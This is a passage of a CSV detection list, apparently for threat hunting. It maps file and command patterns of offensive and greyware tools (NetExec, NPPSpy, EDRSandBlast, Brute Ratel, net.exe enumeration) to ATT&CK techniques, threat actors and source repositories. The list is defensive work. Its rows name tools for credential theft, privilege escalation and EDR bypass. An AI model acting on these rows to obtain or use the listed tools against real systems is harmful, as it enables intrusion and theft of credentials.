TA0009","N/A","N/A","discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\net.exe* localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*\net.exe* sessions*","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*\net.exe* view */domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*\net1 sessions*","greyware_tool_keyword","net","List active SMB session","T1135 - T1047","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*\netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\netexec.yml*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NetExec-main\*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NetLoader.exe*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*\netscan.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*\netscan.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\netscan.lic*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*\netscan.xml*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*\netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\netscan_portable\*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\NimBlackout*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*\NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*\Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*\nmap.exe*/24*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*\nopac.exe*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*\nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NoPowerShell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.c*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\NPPSpy.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*\ntdlol.txt*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*\ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*\ntlmutil.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*\ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*\nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\out_pe.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*\padre\pkg\exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*\papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*\papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*\ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*\parsers\nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*\PerfExec.exe*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" +"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\pipe\brutepipe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*\PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*\PipeViewer\Program.cs*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*\PoC\PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*\POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*\portbender.*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 